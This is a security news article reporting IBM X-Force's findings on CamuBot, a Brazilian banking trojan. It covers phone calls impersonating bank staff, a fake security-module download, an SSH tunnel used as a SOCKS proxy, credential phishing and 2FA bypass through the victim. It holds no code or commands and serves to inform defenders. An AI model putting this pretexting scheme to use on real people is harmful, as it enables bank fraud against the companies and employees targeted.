CamuBot Banking Trojan Uses Social Engineering to Hide in Plain Sight
IBM X-Force experts have discovered a new banking trojan called CamuBot, which first appeared last month in Brazil and stands out from most similar threats. CamuBot targets a wide range of companies and government organizations, but the main “weapon” used by attackers is social engineering. The malware authors disguise their trojan as a legitimate bank security application and pose as bank employees. As a result, victims end up installing the trojan themselves, following step-by-step instructions given over the phone by a live operator.
How CamuBot Attacks Work
According to IBM X-Force analysts, the criminals carefully prepare for each attack. They identify companies and organizations that do business with a specific financial institution and customize the malware with the appropriate branding and logos.
The attackers then call the targeted company, reaching out to an employee who is most likely to have access to the corporate banking account credentials. Pretending to be representatives of the company’s bank, the criminals ask the victim to follow a link and check the status of a supposed bank security module. The website, which is carefully crafted to look legitimate, informs the victim that the security software needs to be urgently updated. If the victim falls for the scam and decides to download the updated security module (which also requires administrator privileges), they actually download the CamuBot trojan.
Technical Details and Social Engineering
Still masquerading as a bank security module, the trojan adds itself to the list of trusted applications in Windows Firewall, installs a SOCKS proxy (via SSH), and enables port forwarding. This two-way tunnel allows the attackers to use the victim’s IP address when accessing the company’s bank account.
The criminals also obtain banking credentials through social engineering. After installation, CamuBot opens a fake bank website and prompts the user to log in, sending this information directly to the attackers.
Bypassing Two-Factor Authentication
IBM X-Force experts emphasize that the developers of CamuBot and this sophisticated attack scheme have even accounted for the possibility of encountering two-factor authentication (2FA). If the bank account is additionally protected by 2FA or biometrics, the malware can install the necessary drivers for the authentication device. The operator then asks the victim over the phone to provide the temporary code or grant remote access to the fake bank employee.